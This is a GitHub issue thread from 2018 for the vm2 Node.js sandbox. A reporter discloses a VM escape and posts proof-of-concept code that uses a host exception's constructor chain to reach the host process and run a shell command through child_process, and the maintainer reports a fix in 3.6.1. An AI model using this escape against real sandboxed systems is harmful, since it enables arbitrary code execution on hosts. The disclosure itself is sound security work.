Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

VM Escape #138

eugenekolo opened this issue Jun 27, 2018 · 1 comment

VM Escape #138

eugenekolo opened this issue Jun 27, 2018 · 1 comment


Copy link

@eugenekolo eugenekolo commented Jun 27, 2018

It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.

In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:

The vm module is not a security mechanism. Do not use it to run untrusted code.

I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.

const {NodeVM} = require('vm2'); 
nvm = new NodeVM()`
    try {
        this.process.removeListener(); // or .on, .once, or anything that throws a host exception
    catch (host_exception) {
        console.log('host exception: ' + host_exception.toString());
        host_constructor = host_exception.constructor.constructor;
        host_process = host_constructor('return this')().process;
        console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
patriksimek added a commit that referenced this issue Jun 27, 2018

This comment has been minimized.

Copy link

@patriksimek patriksimek commented Jun 27, 2018

@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.

The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.

And as with every software out there that claims to be secure - it is safe until someone finds the way how to break it.

@eight04 eight04 mentioned this issue Jul 22, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
2 participants
You can’t perform that action at this time.